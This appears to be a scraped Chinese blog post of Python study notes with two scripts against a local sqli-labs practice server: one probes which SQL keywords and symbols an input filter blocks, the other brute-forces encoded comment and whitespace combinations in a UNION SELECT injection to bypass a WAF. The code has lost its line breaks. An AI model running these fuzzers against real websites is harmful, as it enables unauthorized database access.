import requestssql_char = ['select', 'union', 'and', 'or', '', 'select union', 'sleep', 'like', 'group', 'order', 'by', 'ascii', 'updatexml', 'handler', 'insert', '\', '\ ', '@', 'all', '#', '-', '"', ')', '--', '+', '=', '/',' ']url = "http://192.168.126.132:5001/sqli/less-1/index,PHP/"header = { 'Host': '192.168.126.132:5001', 'User-Agent': 'Mozilla/5.0 (windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 firefox/79.0', 'Accept': 'text/HTML,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', 'Accept-EnCoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded'}for char in sql_char: post_data = "query=test" + char + "&submit2=sbumit" res = requests.post(url, data=post_data, headers=header) if 'Illegal Char' in res.text: print("过滤字符: {0}".format(char)) else: print("通过: {0}".format(char))
2import requestsfuzz_a = ['/*','*/','/*!','*','=','`','!','@','%','.','-','+','|','%00','%0a','%23','%20']fuzz_b = ['',' ']fuzz_c = ['%0a','%0b','%0c','%0d','%0e','%0f','%0g','%0h','%0i','%0j','%0h']FUZZ = fuzz_a + fuzz_b + fuzz_cdef work(url): for a in FUZZ: for b in FUZZ: for c in FUZZ: exp = url + "%27%20union" + "--%20asdasd" + a + b + c + "select" + "%201,2,3%20%23" response = requests.get(url=exp).content if "waf" in str(response) or "error" in str(response): pass else: print(exp)if __name__ == '__main__': url = "http://192.168.126.132:5001/sqli/Less-1/index.PHP?ID=-1" work(url)
总结 以上是内存溢出为你收集整理的python学习之路day6全部内容,希望文章能够帮你解决python学习之路day6所遇到的程序开发问题。
如果觉得内存溢出网站内容还不错,欢迎将内存溢出网站推荐给程序员好友。
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)